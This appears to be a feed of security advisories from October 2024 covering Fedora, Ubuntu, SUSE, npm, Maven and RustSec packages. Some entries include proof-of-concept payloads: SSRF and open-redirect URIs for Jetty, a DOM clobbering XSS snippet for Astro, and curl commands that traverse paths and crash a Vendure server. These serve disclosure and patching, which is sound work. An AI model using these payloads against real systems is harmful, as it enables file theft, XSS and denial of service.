12.10.2024 03:23:58	fedora	[FEDORA-2024-a59306afa3] Fedora 41: chromium (high)	Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in V	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a59306afa3
12.10.2024 03:23:57	fedora	[FEDORA-2024-b8b5224019] Fedora 41: kernel, kernel-headers	The 6.11.3 stable kernel update contains a number of important bugfixes acrossthe tree.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b8b5224019
12.10.2024 03:21:33	fedora	[FEDORA-2024-89014f5794] Fedora 41: python-virtualenv	Prevent command injection by quoting template strings in activation scripts	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-89014f5794
12.10.2024 03:21:03	fedora	[FEDORA-2024-0078a55acf] Fedora 41: mosquitto	Update to 2.0.19Fix FTBFS (closes rhbz#2300978)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0078a55acf
12.10.2024 03:20:50	fedora	[FEDORA-2024-2096f5d14c] Fedora 41: rust-libcramjam, rust-brotli-decompressor, rust-nu-command, rust-brotli, rust-tower-http & 4 more	Update rust-brotli-decompressor to 4.0.1, rust-brotli to 7.0.0, and rust-async-compression to 0.4.13. Patch dependent packages as needed to avoid compatpackages. Drop i686 support in rust-libcramjam and python-cramjam.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2096f5d14c
12.10.2024 01:16:59	maven	[MAVEN:GHSA-76MW-6P95-X9X5] pac4j-core affected by a Java deserialization vulnerability (critical)	pac4j is a security framework for Java. `pac4j-core` prior to version 4.0.0 is affected by a Java deserialization vulnerability. The vulnerability affects systems that store externally controlled values in attributes of the `UserProfile` class from pac4j-core. It can be exploited by providing an attribute that contains a serialized Java object with a special prefix `{#sb64}` and Base64 encoding. This issue may lead to Remote Code Execution (RCE) in the worst case. Although a `RestrictedObjectInputStream` is in place, that puts some restriction on what classes can be deserialized, it still allows a broad range of java packages and potentially exploitable with different gadget chains. pac4j versions 4.0.0 and greater are not affected by this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-76MW-6P95-X9X5
11.10.2024 22:44:07	npm	[NPM:GHSA-VGXQ-6RCF-QWRW] angular-base64-upload vulnerable to unauthenticated remote code execution (critical)	angular-base64-upload versions prior to v0.1.21 are vulnerable to unauthenticated remote code execution via the `angular-base64-upload/demo/server.php` endpoint. Exploitation of this vulnerability involves uploading arbitrary file content to the server, which can subsequently accessed through the `angular-base64-upload/demo/uploads` endpoint. This leads to the execution of previously uploaded content which enables the attacker to achieve code execution on the server.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VGXQ-6RCF-QWRW
11.10.2024 20:27:30	npm	[NPM:GHSA-GX9M-WHJM-85JF] DOMpurify has a nesting-based mXSS (high)	DOMpurify was vulnerable to nesting-based mXSS fixed by [0ef5e537](https://github.com/cure53/DOMPurify/tree/0ef5e537a514f904b6aa1d7ad9e749e365d7185f) (2.x) and[merge 943](https://github.com/cure53/DOMPurify/pull/943)Backporter should be aware of GHSA-mmhx-hmjr-r674 (CVE-2024-45801) when cherry-pickingPOC is avaible under [test](https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GX9M-WHJM-85JF
11.10.2024 19:51:57	ubuntu	[USN-7063-1] Ubuntu Advantage Desktop Daemon vulnerability	Ubuntu Advantage Desktop Daemon could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7063-1
11.10.2024 18:00:52	suse	[SUSE-SU-2024:3604-1] Security update for OpenIPMI (moderate)	Security update for OpenIPMI	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3604-1
11.10.2024 15:33:46	suse	[SUSE-SU-2024:3603-1] Security update for MozillaFirefox (critical)	Security update for MozillaFirefox	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3603-1
13.10.2024 04:32:37	fedora	[FEDORA-2024-ec78ab2c45] Fedora 39: p7zip	Fix wrapper to hide password from process history	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ec78ab2c45
13.10.2024 03:42:35	fedora	[FEDORA-2024-2e8c63e8bf] Fedora 41: buildah, podman (medium)	Automatic update for buildah-1.37.4-1.fc41, podman-5.2.4-1.fc41.Changelog for buildah* Mon Oct 07 2024 Packit <hello(a)packit.dev> - 2:1.37.4-1- Update to 1.37.4 upstream releaseChangelog for podman* Mon Oct 07 2024 Packit <hello(a)packit.dev> - 5:5.2.4-1- Update to 5.2.4 upstream releaseFixes CVE-2024-9341 and CVE-2024-9407.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e8c63e8bf
14.10.2024 04:57:23	fedora	[FEDORA-2024-2ac7273bab] Fedora 40: libgsf (high)	Fixes for memory vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2ac7273bab
14.10.2024 04:56:53	fedora	[FEDORA-2024-9694c3eec0] Fedora 40: webkit2gtk4.0 (high)	Update to 2.46.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9694c3eec0
14.10.2024 04:42:56	fedora	[FEDORA-2024-7d06f67cf5] Fedora 39: libgsf (high)	Fixes for memory vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7d06f67cf5
13.10.2024 04:32:51	fedora	[FEDORA-2024-5ee2c7c696] Fedora 39: chromium (high)	Update to 129.0.6668.100 * CVE-2024-9602: Type Confusion in V8 * CVE-2024-9603: Type Confusion in V	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5ee2c7c696
15.10.2024 03:19:45	fedora	[FEDORA-2024-9cc95d56ce] Fedora 41: edk2	Security fix for CVE-2023-6237 (openssl: Excessive time spent checking invalidRSA public keys)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9cc95d56ce
15.10.2024 03:19:44	fedora	[FEDORA-2024-ff08c2b41a] Fedora 41: libgsf (high)	Fixes for memory vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ff08c2b41a
15.10.2024 03:19:36	fedora	[FEDORA-2024-347164df1c] Fedora 41: rust-tower, rust-rustls-native-certs, rust-reqwest, rust-rustls-native-certs0.7, rust-tonic-types & 6 more (none)	Update the hyper-rustls crate to version 0.27.3.Update the reqwest crate to version 0.12.8.Update the rustls-native-certs crate to version 0.8.0 and add a compat packagefor version 0.7.Update the tonic, tonic-build, and tonic-types crates to version 0.12.3.Update the tower crate to version 0.5.1 and add a compat package for version0.4.Update the tower-http crate to version 0.6.1 and add a compat package forversion 0.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-347164df1c
15.10.2024 03:19:20	fedora	[FEDORA-2024-825c52d96f] Fedora 41: koji	Update to 1.35.1. Includes fix for CVE-2024-9427	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-825c52d96f
15.10.2024 00:11:44	maven	[MAVEN:GHSA-QH8G-58PP-2WXH] Eclipse Jetty URI parsing of invalid authority (low)	## SummaryEclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, `HttpURI`, for URI/URL parsing.The `HttpURI` class does insufficient validation on the authority segment of a URI. However the behaviour of `HttpURI` differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RRC. Specifically `HttpURI` and the browser may differ on the value of the host extracted from an invalid URI and thus a combination of Jetty and a vulnerable browser may be vulnerable to a open redirect attack or to a SSRF attack if the URI is used after passing validation checks.## Details### Affected componentsThe vulnerable component is the `HttpURI` class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.### Attack overviewThe `HttpURI` class does not well validate the authority section of a URI. When presented with an illegal authority that may contain user info (eg username:password#@hostname:port), then the parsing of the URI is not failed. Moreover, the interpretation of what part of the authority is the host name differs from a common browser in that they also do not fail, but they select a different host name from the illegal URI.### Attack scenarioA typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.This attack occurs when the Validator is the `org.eclipse.jetty.http.HttpURI` class and the Requester is the `Browser` (include chrome, firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., `http://browser.check%23%40vulndetector.com/` ). After validation, the Validator finds that the hostname is not on the blocklist. However, the Requester can still send requests to the domain with the hostname `vulndetector.com`.## PoCpayloads:```http://browser.check &@vulndetector.com/http://browser.check #@vulndetector.com/http://browser.check?@vulndetector.com/http://browser.check#@vulndetector.com/http://vulndetector.com\\/```The problem of 302 redirect parsing in HTML tag scenarios. Below is a poc example. After clicking the button, the browser will open "browser.check", and jetty will parse this URL as "vulndetector.com".```<a href="http://browser.check#@vulndetector.com/"></a>```A comparison of the parsing differences between Jetty and chrome is shown in the table below (note that neither should accept the URI as valid).\| Invalid URI \| Jetty \| Chrome \|\| ---------------------------------------------- \| ---------------- \| ------------- \|\| http://browser.check &@vulndetector.com/ \| vulndetector.com \| browser.check \|\| http://browser.check #@vulndetector.com/ \| vulndetector.com \| browser.check \|\| http://browser.check?@vulndetector.com/ \| vulndetector.com \| browser.check \|\| http://browser.check#@vulndetector.com/ \| vulndetector.com \| browser.check \|The problem of 302 redirect parsing in HTTP 302 Location\| Input \| Jetty \| Chrome \|\| ------------------------ \| -------------- \| ------------- \|\| http://browser.check%5c/ \| browser.check\ \| browser.check \|It is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].## ImpactThe impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block on some hosts based on HttpURI's handling of authority section. The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to SSRF[1] and URL Redirection[2] vulnerabilities in several cases. ## MitigationThe attacks outlined above rely on decoded user data being passed to the `HttpURI` class. Application should not pass decoded user data as an encoded URI to any URI class/method, including `HttpURI`. Such applications are likely to be vulnerable in other ways. The immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per [RFC9110 Section 4.2.4](https://datatracker.ietf.org/doc/html/rfc9110#section-4.2.4). Note that the Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).## Reference[1] https://cwe.mitre.org/data/definitions/918.html[2] https://cwe.mitre.org/data/definitions/601.html	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QH8G-58PP-2WXH
15.10.2024 00:08:39	maven	[MAVEN:GHSA-G8M5-722R-8WHQ] Eclipse Jetty's ThreadLimitHandler.getRemote() vulnerable to remote DoS attacks (moderate)	### ImpactRemote DOS attack can cause out of memory ### DescriptionThere exists a security vulnerability in Jetty's `ThreadLimitHandler.getRemote()` whichcan be exploited by unauthorized users to cause remote denial-of-service (DoS) attack. Byrepeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust theserver's memory.### Affected Versions* Jetty 12.0.0-12.0.8 (Supported)* Jetty 11.0.0-11.0.23 (EOL)* Jetty 10.0.0-10.0.23 (EOL)* Jetty 9.3.12-9.4.55 (EOL)### Patched Versions* Jetty 12.0.9* Jetty 11.0.24* Jetty 10.0.24* Jetty 9.4.56### WorkaroundsDo not use `ThreadLimitHandler`. Consider use of `QoSHandler` instead to artificially limit resource utilization.### ReferencesJetty 12 - https://github.com/jetty/jetty.project/pull/11723	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G8M5-722R-8WHQ
15.10.2024 00:07:30	maven	[MAVEN:GHSA-R7M4-F9H5-GR79] Eclipse Jetty's PushSessionCacheFilter can cause remote DoS attacks (low)	### Impact Jetty PushSessionCacheFilter can be exploited by unauthenticated users to launch remote DoS attacks by exhausting the server’s memory.### Patches* https://github.com/jetty/jetty.project/pull/9715* https://github.com/jetty/jetty.project/pull/9716### WorkaroundsThe session usage is intrinsic to the design of the PushCacheFilter. The issue can be avoided by: + not using the PushCacheFilter. Push has been deprecated by the various IETF specs and early hints responses should be used instead. + reducing the reducing the idle timeout on unauthenticated sessions will reduce the time such session stay in memory. + configuring a session cache to use [session passivation](https://jetty.org/docs/jetty/12/programming-guide/server/session.html), so that sessions are not stored in memory, but rather in a database or file system that may have significantly more capacity than memory.### References* https://github.com/jetty/jetty.project/pull/10756* https://github.com/jetty/jetty.project/pull/10755	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R7M4-F9H5-GR79
14.10.2024 23:56:44	maven	[MAVEN:GHSA-XMMM-JW76-Q7VG] One Time Passcode (OTP) is valid longer than expiration timeSeverity (moderate)	A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when the OTP token period is set to 30 seconds (default). Instead of expiring and deemed unusable around 30 seconds in, the tokens are valid for an additional 30 seconds totaling 1 minute. A one time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time, two OTPs are valid.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XMMM-JW76-Q7VG
14.10.2024 23:55:49	maven	[MAVEN:GHSA-5RXP-2RHR-QWQV] Session fixation in Elytron SAML adapters (high)	A session fixation issue was discovered in the SAML adapters provided by Keycloak. The session ID and JSESSIONID cookie are not changed at login time, even when the turnOffChangeSessionIdOnLogin option is configured. This flaw allows an attacker who hijacks the current session before authentication to trigger session fixation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5RXP-2RHR-QWQV
14.10.2024 23:55:24	maven	[MAVEN:GHSA-W8GR-XWP4-R9F7] Vulnerable Redirect URI Validation Results in Open Redirect (moderate)	A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost/ or http://127.0.0.1/, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W8GR-XWP4-R9F7
14.10.2024 23:54:53	maven	[MAVEN:GHSA-XGFV-XPX8-QHCR] Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak (high)	A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XGFV-XPX8-QHCR
15.10.2024 01:24:03	npm	[NPM:GHSA-M85W-3H95-HCF9] DOM Clobbering Gadget found in astro's client-side router that leads to XSS (moderate)	### SummaryA DOM Clobbering gadget has been discoverd in Astro's client-side router. It can lead to cross-site scripting (XSS) in websites enables Astro's client-side routing and has stored attacker-controlled scriptless HTML elements (i.e., `iframe` tags with unsanitized `name` attributes) on the destination pages.### Details#### BackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:[1] https://scnps.co/papers/sp23_domclob.pdf[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/#### Gadgets found in AstroWe identified a DOM Clobbering gadget in Astro's client-side routing module, specifically in the `<ViewTransitions />` component. When integrated, this component introduces the following vulnerable code, which is executed during page transitions (e.g., clicking an `<a>` link):https://github.com/withastro/astro/blob/7814a6cad15f06931f963580176d9b38aa7819f2/packages/astro/src/transitions/router.ts#L135-L156However, this implementation is vulnerable to a DOM Clobbering attack. The `document.scripts` lookup can be shadowed by an attacker injected non-script HTML elements (e.g., `<img name="scripts"><img name="scripts">`) via the browser's named DOM access mechanism. This manipulation allows an attacker to replace the intended script elements with an array of attacker-controlled scriptless HTML elements. The condition `script.dataset.astroExec === ''` on line 138 can be bypassed because the attacker-controlled element does not have a data-astroExec attribute. Similarly, the check on line 134 can be bypassed as the element does not require a `type` attribute.Finally, the `innerHTML` of an attacker-injected non-script HTML elements, which is plain text content before, will be set to the `.innerHTML` of an script element that leads to XSS.### PoCConsider a web application using Astro as the framework with client-side routing enabled and allowing users to embed certain scriptless HTML elements (e.g., `form` or `iframe`). This can be done through a bunch of website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.For PoC website, please refer to: `https://stackblitz.com/edit/github-4xgj2d`. Clicking the "about" button in the menu will trigger an `alert(1)` from an attacker-injected `form` element.```---import Header from "../components/Header.astro";import Footer from "../components/Footer.astro";import { ViewTransitions } from "astro:transitions";import "../styles/global.css";const { pageTitle } = Astro.props;---<html lang="en"> <head> <meta charset="utf-8" /> <link rel="icon" type="image/svg+xml" href="/favicon.svg" /> <meta name="viewport" content="width=device-width" /> <meta name="generator" content={Astro.generator} /> <title>{pageTitle}</title> <ViewTransitions /> </head> <body> <!--USER INPUT--> <iframe name="scripts">alert(1)</iframe> <iframe name="scripts">alert(1)</iframe> <!--USER INPUT--> <Header /> <h1>{pageTitle}</h1> <slot /> <Footer /> <script> import "../scripts/menu.js"; </script> </body></html>```### ImpactThis vulnerability can result in cross-site scripting (XSS) attacks on websites that built with Astro that enable the client-side routing with `ViewTransitions` and store the user-inserted scriptless HTML tags without properly sanitizing the `name` attributes on the page.### PatchWe recommend replacing `document.scripts` with `document.getElementsByTagName('script')` for referring to script elements. This will mitigate the possibility of DOM Clobbering attacks leveraging the `name` attribute.### ReferenceSimilar issues for reference:+ Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986))+ Vite ([CVE-2024-45812](https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3))+ layui ([CVE-2024-47075](https://github.com/layui/layui/security/advisories/GHSA-j827-6rgf-9629))	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M85W-3H95-HCF9
14.10.2024 22:45:23	npm	[NPM:GHSA-G77X-44XX-532M] Denial of Service condition in Next.js image optimization (moderate)	### ImpactThe image optimization feature of Next.js contained a vulnerability which allowed for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption.Not affected:- The `next.config.js` file is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value.- The Next.js application is hosted on Vercel. ### PatchesThis issue was fully patched in Next.js `14.2.7`. We recommend that users upgrade to at least this version.### WorkaroundsEnsure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.#### CreditsBrandon Dahler (brandondahler), AWSDimitrios Vlastaras	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G77X-44XX-532M
15.10.2024 00:17:14	maven	[MAVEN:GHSA-443J-GRXV-2PGV] Apache ActiveMQ Artemis: Authenticated users could perform RCE via Jolokia MBeans (high)	Apache ActiveMQ Artemis allows access to diagnostic information and controls through MBeans, which are also exposed through the authenticated Jolokia endpoint. Before version 2.29.0, this also included the Log4J2 MBean. This MBean is not meant for exposure to non-administrative users. This could eventually allow an authenticated attacker to write arbitrary files to the filesystem and indirectly achieve RCE.Users are recommended to upgrade to version 2.29.0 or later, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-443J-GRXV-2PGV
14.10.2024 18:57:06	ubuntu	[USN-7040-2] ConfigObj vulnerability (medium)	ConfigObj could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7040-2
14.10.2024 18:48:57	ubuntu	[USN-7014-3] nginx vulnerability (medium)	nginx could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7014-3
15.10.2024 00:14:32	maven	[MAVEN:GHSA-J26W-F9RQ-MR2Q] Eclipse Jetty has a denial of service vulnerability on DosFilter (moderate)	DescriptionThere exists a security vulnerability in Jetty's DosFilter which can be exploited by unauthorized users to cause remote denial-of-service (DoS) attack on the server using DosFilter. By repeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the server's memory finally.Vulnerability detailsThe Jetty DoSFilter (Denial of Service Filter) is a security filter designed to protect web applications against certain types of Denial of Service (DoS) attacks and other abusive behavior. It helps to mitigate excessive resource consumption by limiting the rate at which clients can make requests to the server. The DoSFilter monitors and tracks client request patterns, including request rates, and can take actions such as blocking or delaying requests from clients that exceed predefined thresholds. The internal tracking of requests in DoSFilter is the source of this OutOfMemory condition.ImpactUsers of the DoSFilter may be subject to DoS attacks that will ultimately exhaust the memory of the server if they have not configured session passivation or an aggressive session inactivation timeout.PatchesThe DoSFilter has been patched in all active releases to no longer support the session tracking mode, even if configured.Patched releases: * 9.4.54 * 10.0.18 * 11.0.18 * 12.0.3	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J26W-F9RQ-MR2Q
14.10.2024 17:00:19	ubuntu	[USN-6968-3] PostgreSQL vulnerability (high)	PostgreSQL could execute arbitrary SQL functions as the superuserif it received a specially crafted SQL object.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-3
14.10.2024 15:54:27	ubuntu	[USN-7015-4] Python vulnerability (medium)	Python could me made to bypass some restrictions if it received speciallycrafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-4
14.10.2024 15:54:08	ubuntu	[USN-7067-1] HAProxy vulnerability (high)	HAProxy could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7067-1
14.10.2024 09:21:48	ubuntu	[USN-7066-1] Thunderbird vulnerability (critical)	Thunderbird could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7066-1
14.10.2024 06:51:43	ubuntu	[USN-7065-1] Firefox vulnerability (critical)	Firefox could be made to run programs as your login if it opened a malicious website.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7065-1
14.10.2024 22:18:55	rustsec	[RUSTSEC-2024-0378] Risk of use-after-free in `borrowed` reads from Python weak references	The family of functions to read "borrowed" values from Python weak referenceswere fundamentally unsound, because the weak reference does itself not haveownership of the value. At any point the last strong reference couldbe cleared and the borrowed value would become dangling.In PyO3 0.22.4 these functions have all been deprecated and patched to leak astrong reference as a mitigation. PyO3 0.23 will remove these functions entirely.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0378
14.10.2024 19:27:22	npm	[NPM:GHSA-PPPG-CPFQ-H7WR] JSONPath Plus Remote Code Execution (RCE) Vulnerability (critical)	Versions of the package jsonpath-plus before 10.0.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node.Note:The unsafe behavior is still available after applying the fix but it is not turned on by default.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PPPG-CPFQ-H7WR
16.10.2024 04:34:57	fedora	[FEDORA-2024-83e96146cf] Fedora 39: valkey (high)	update to 8.0.1fixes (CVE-2024-31449) Lua library commands may lead to stack overflow andpotential RCE. (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors. (CVE-2024-31228) Potential Denial-of-service due to unbounded patternmatching.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-83e96146cf
16.10.2024 04:34:56	fedora	[FEDORA-2024-08a6626c11] Fedora 39: pdns-recursor (high)	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-08a6626c11
16.10.2024 04:08:03	fedora	[FEDORA-2024-8a9a692906] Fedora 40: valkey (high)	update to 8.0.1fixes (CVE-2024-31449) Lua library commands may lead to stack overflow andpotential RCE. (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors. (CVE-2024-31228) Potential Denial-of-service due to unbounded patternmatching.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8a9a692906
16.10.2024 04:08:02	fedora	[FEDORA-2024-af0bf62ac6] Fedora 40: pdns-recursor (high)	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-af0bf62ac6
15.10.2024 22:56:06	npm	[NPM:GHSA-QCVH-P9JQ-WP8V] Malicious homeservers can steal message keys when the matrix-react-sdk user invites another user to a room (high)	### Impactmatrix-react-sdk before 3.102.0 allows a malicious homeserver to potentially steal message keys for a room when a user invites another user to that room, via injection of a malicious device controlled by the homeserver. This is possible because matrix-react-sdk before 3.102.0 shared historical message keys on invite.### Patchesmatrix-react-sdk 3.102.0 [disables sharing message keys on invite](https://github.com/matrix-org/matrix-react-sdk/pull/12618) by removing calls to the vulnerable functionality.### WorkaroundsNone.### ReferencesThe vulnerability in matrix-react-sdk is caused by calling `MatrixClient.sendSharedHistoryKeys` in matrix-js-sdk, which is inherently vulnerable to this sort of attack. This matrix-js-sdk vulnerability is tracked as CVE-2024-47080 / [GHSA-4jf8-g8wp-cx7c](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-4jf8-g8wp-cx7c). Given that this functionality is not specific to sharing message keys on invite, is optional, has to be explicitly called by the caller and has been independently patched in matrix-react-sdk by removing the offending calls, we believe it is proper to treat the matrix-react-sdk vulnerability as a separate one, with its own advisory and CVE.The matrix-org/matrix-react-sdk repository has recently been archived and the project was moved to [element-hq/matrix-react-sdk](https://github.com/element-hq/matrix-react-sdk). Given that this happened after the first patched release, no releases of the project on [element-hq/matrix-react-sdk](https://github.com/element-hq/matrix-react-sdk) were ever vulnerable to this vulnerability.Patching pull request: https://github.com/matrix-org/matrix-react-sdk/pull/12618.### For more informationIf you have any questions or comments about this advisory, please email us at security at [security at matrix.org](mailto:security@matrix.org).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QCVH-P9JQ-WP8V
15.10.2024 21:07:26	npm	[NPM:GHSA-4JF8-G8WP-CX7C] Matrix JavaScript SDK's key history sharing could share keys to malicious devices (high)	### ImpactIn matrix-js-sdk versions 9.11.0 through 34.7.0, the method `MatrixClient.sendSharedHistoryKeys` is vulnerable to interception by malicious homeservers. The method implements functionality proposed in [MSC3061](https://github.com/matrix-org/matrix-spec-proposals/pull/3061) and can be used by clients to share historical message keys with newly invited users, granting them access to past messages in the room.However, it unconditionally sends these "shared" keys to all of the invited user's devices, regardless of whether the user's cryptographic identity is verified or whether the user's devices are signed by that identity. This allows the attacker to potentially inject its own devices to receive sensitive historical keys without proper security checks.Note that this only affects clients running the SDK with the legacy crypto stack. Clients using the new Rust cryptography stack (i.e. those that call `MatrixClient.initRustCrypto()` instead of `MatrixClient.initCrypto()`) are unaffected by this vulnerability, because `MatrixClient.sendSharedHistoryKeys()` raises an exception in such environments.### PatchesFixed in matrix-js-sdk 34.8.0 by removing the vulnerable functionality.### WorkaroundsRemove use of affected functionality from clients.### References- [MSC3061](https://github.com/matrix-org/matrix-spec-proposals/pull/3061)### For more informationIf you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4JF8-G8WP-CX7C
15.10.2024 22:56:27	npm	[NPM:GHSA-R9MQ-3C9R-FMJQ] Vendure asset server plugin has local file read vulnerability with AssetServerPlugin & LocalAssetStorageStrategy (critical)	# Description## Path traversalThis vulnerability allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server.From Rajesh Sharma who discovered the vulnerability:POC: `curl --path-as-is http://localhost:3000/assets/../package.json` gives you the content of package.json present in the local directory.The vulnerability stems from usage of decodedReqPath directly in path.join without performing any path normalization i.e path.normalize in node.jshttps://github.com/vendure-ecommerce/vendure/blob/801980e8f599c28c5059657a9d85dd03e3827992/packages/asset-server-plugin/src/plugin.ts#L352-L358If the vendure service is behind some server like nginx, apache, etc. Path normalization is performed on the root server level but still the actual client's request path will be sent to vendure service but not the resultant normalized path. However, depending the type of root server one can try various payloads to bypass such normalization. The reporter found a customer website which uses local asset plugin and using above mentioned vulnerability, and was able to find secrets like email credentials.## DOS via malformed URIIn the same code path is an additional vector for crashing the server via a malformed URIAgain from Rajesh:There is also a potential Denial of Service (DoS) issue when incorrectly encoded URI characters are passed as part of the asset URL. When these malformed requests are processed, they can lead to system crashes or resource exhaustion, rendering the service unavailable to users.Exploit: `curl --path-as-is http://localhost:3000/assets/%80package.json` , here `%80` is not a valid url-encoded character hence the decodeURIComponent is called on it, the entire app crashes. ```[:server] /Users/abc/mywork/vendure/packages/asset-server-plugin/src/plugin.ts:353[:server] const decodedReqPath = decodeURIComponent(req.path);[:server] ^[:server] URIError: URI malformed```### Patchesv3.0.5, v2.3.3### Workarounds- Use object storage rather than the local file system, e.g. MinIO or S3- Define middleware which detects and blocks requests with urls containing `/../`	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R9MQ-3C9R-FMJQ
